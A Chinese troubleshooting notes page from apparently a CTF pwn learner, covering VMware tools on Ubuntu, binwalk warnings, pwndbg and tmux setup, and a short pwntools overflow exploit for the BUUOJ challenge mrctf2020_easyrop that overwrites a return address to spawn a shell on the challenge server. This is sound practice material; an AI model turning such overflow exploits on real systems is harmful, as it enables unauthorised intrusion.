遇到的奇奇怪怪问题汇总

vmware自带的vmtools安装了也复制不进来

虚拟机执行命令

sudo apt-get install open-vm-tools-desktop

如果拖放文件的时候出现了

sudo gedit /etc/gdm3/custom.conf

将WaylandEnable=false注释掉

据说是vmware还没有支持ubutnu22.04的默认桌面Wayland

sleep ？

题目：

https://buuoj.cn/challenges#mrctf2020_easyrop

本来是很简单的一个溢出

from pwn import *
from time import sleep
#r = process('./mrctf2020_easyrop')
r = remote('node4.buuoj.cn',25663)
system_sh =0x000000000040072A
r.sendline(b'2')
#sleep(1)
r.sendline(b'a'*0x300)
r.sendline(b'7')
#sleep(1)
r.sendline(b'a'* 0x12 + p64(system_sh))
r.interactive()

但是不加sleep无法通过

有人说是python同时发送多个字符串时会合并(?)

那什么时候情况下需要在sendline前面加一个sleep

​ [已解决] 打本地不加应该没事，打远程的时候肯定会有一点延迟，假如没有sendafter这一类的发送，就可能会造成后面的也一起发送了，所以每次写exp发送的时候最好用sendafter或者sendlineafter这样的话就不需要再担心sleep(1)了

---

binwalk提取固件时快捷方式指向/dev/null

binwalk提取固件时会有一个warning

WARNING: Symlink points outside of the extraction directory: /home/kali/Desktop/dir815_FW_101/_DIR-815 FW 1.01b14_1.01b14.bin.extracted/squashfs-root/htdocs/web/dlcfg.cgi -> /htdocs/cgibin; changing link target to /dev/null for security purposes.

用到这个快捷方式时要修改一下

sendlineafter的问题

要加上换行符\n，否则匹配不上

p.sendlineafter(b'Input your Plaintext to be encrypted\n',...)

python调用c库函数

from ctypes import *
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
libc.srand(0)
libc.rand()%6 + 1

安装ubuntu18，pwndbg安装不上（setup.sh总有问题）

选择用pwndbg release的安装包，安装之后把/usr/bin/gdb给改成/usr/ bin/pwndbg的软连接

然后在调用gdb.attach时弹不出来新的窗口：

采用tmux解决，安装tmux后，程序开头加上一句话

context.terminal = ["tmux", "splitw", "-h"]

然后再命令行先运行sudo tmux，然后运行exp.py，就可以弹出来gdb了。

然后发现无法滚动鼠标，使用ctrl + shift + b + :进入命令模式，输入set -g mouse on

就可以滚动终端了